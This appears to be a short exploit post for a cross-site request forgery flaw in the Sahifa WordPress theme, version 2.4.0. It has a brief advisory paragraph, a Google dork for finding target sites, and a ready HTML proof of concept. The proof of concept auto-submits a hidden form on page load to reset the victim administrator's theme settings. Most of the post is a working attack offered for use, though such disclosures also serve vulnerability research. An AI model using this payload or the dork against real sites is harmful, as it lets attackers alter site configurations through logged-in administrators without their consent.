facebook facebook twitter rss

Wordpress sahifa theme CSRF exploit

Author: Dr.AFN[D]ENA , Published: 19-01-2015
The Sahifa theme for WordPress is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests. 

Exploiting these issues may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.

Sahifa 2.4.0 is vulnerable; other versions may also be affected.

Dork:inurl:wp-admin/admin.php
<h1>Wordpress sahifa theme CSRF exploit By Dr.AFN[D]ENA<br></h1>

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://local/wp/wp-admin/admin.php?page=panel&reset=true">
<input type="hidden" name="action" value="reset" />
<!-- <input name="reset" type="submit" value="Reset Settings" />-->
</form>

Like us on Facebook :